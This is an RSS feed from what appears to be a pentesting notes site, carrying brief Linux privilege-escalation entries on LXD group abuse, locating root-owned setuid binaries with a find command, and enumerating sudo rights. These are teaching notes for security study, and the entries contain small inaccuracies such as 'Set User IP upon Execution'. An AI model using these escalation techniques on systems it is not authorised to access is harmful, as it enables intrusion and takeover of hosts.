<?xml version="1.0" encoding="utf-8" standalone="yes"?><rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom"><channel><title>Linux on LEIKAH</title><link>https://leikah.haoyingcao.xyz/en/tags/linux/</link><description>Recent content in Linux on LEIKAH</description><generator>Hugo</generator><language>en</language><atom:link href="https://leikah.haoyingcao.xyz/en/tags/linux/index.xml" rel="self" type="application/rss+xml"/><item><title>Linux</title><link>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/</guid><description/></item><item><title>Permission-based</title><link>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/permission/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/permission/</guid><description/></item><item><title>Privileged Groups</title><link>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/permission/priv_groups/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/permission/priv_groups/</guid><description>&lt;p&gt;Certain groups give their members high privileges that can be abused to obtain root access on the host. Below are some examples:&lt;/p&gt;
&lt;h2 id="lxclxd"&gt;LXC/LXD&lt;a class="td-heading-self-link" href="#lxclxd" aria-label="Heading self-link"&gt;&lt;/a&gt;&lt;/h2&gt;
&lt;p&gt;LXD is similar to Docker and is Ubuntu&amp;rsquo;s container manager. Upon installation, all users are added to the LXD group.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-shell-session" data-lang="shell-session"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;devops@NIX02:~$ id
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#bf616a"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;uid=1009(devops) gid=1009(devops) groups=1009(devops),110(lxd)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Membership in the LXD group can be used to escalate privileges by creating an LXD container, making it privileged, and then accessing the host file system at &lt;code&gt;/mnt/root&lt;/code&gt;.&lt;/p&gt;</description></item><item><title>setuid</title><link>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/permission/suid/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/permission/suid/</guid><description>&lt;p&gt;The &lt;strong&gt;Set User IP upon Execution (setuid)&lt;/strong&gt; permission can allow a user to execute a program or script with the permission of another user, typically with elevated privileges.&lt;/p&gt;
&lt;p&gt;We may use the following command to find &lt;code&gt;setuid&lt;/code&gt; files owned by root. Note that setuid executables will be marked with &lt;code&gt;s&lt;/code&gt;.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;find / -user root -perm -4000 -exec ls -ldb &lt;span style="color:#81a1c1"&gt;{}&lt;/span&gt; &lt;span style="color:#ebcb8b"&gt;\;&lt;/span&gt; 2&amp;gt;/dev/null
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;If one of the executables listed above allows command to be executed, it can be leveraged for privilege escalation and execute commands as root.&lt;/p&gt;</description></item><item><title>Sudo</title><link>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/permission/sudo/</link><pubDate>Mon, 01 Jan 0001 00:00:00 +0000</pubDate><guid>https://leikah.haoyingcao.xyz/en/docs/priv_esc/linux/permission/sudo/</guid><description>&lt;p&gt;Sudo privileges can be granted to an account, permitting the account to run certain commands in the context of root or another account. When &lt;code&gt;sudo&lt;/code&gt; is prepended to a command, the system will check if the user issuing the command has the appropriate rights as configured in &lt;code&gt;/etc/sudoers&lt;/code&gt; file.&lt;/p&gt;
&lt;p&gt;Sudo privileges can be enumerated using &lt;code&gt;sudo -l&lt;/code&gt;:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Sometimes running this command requires us to provide the user&amp;rsquo;s password.&lt;/li&gt;
&lt;li&gt;If an entry is marked with &lt;code&gt;NOPASSWD&lt;/code&gt;, we can run the command without providing the user&amp;rsquo;s password.&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#d8dee9;background-color:#2e3440;-moz-tab-size:4;-o-tab-size:4;tab-size:4;-webkit-text-size-adjust:none;"&gt;&lt;code class="language-shell-session" data-lang="shell-session"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;john@NIX02:~$ sudo -l
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#bf616a"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;Matching Defaults entries for john on NIX02:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#bf616a"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;User john may run the following commands on NIX02:
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (root) NOPASSWD: /usr/sbin/tcpdump
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;From here, the goal is to &lt;strong&gt;execute command from the program we are allowed to run&lt;/strong&gt;. We can make use of resources such as &lt;a href="https://gtfobins.org/"&gt;GTFOBins&lt;/a&gt; to find options and other ways to execute command as &lt;code&gt;root&lt;/code&gt;, or research vulnerabilities the specific version of the installed executable listed above.&lt;/p&gt;</description></item></channel></rss>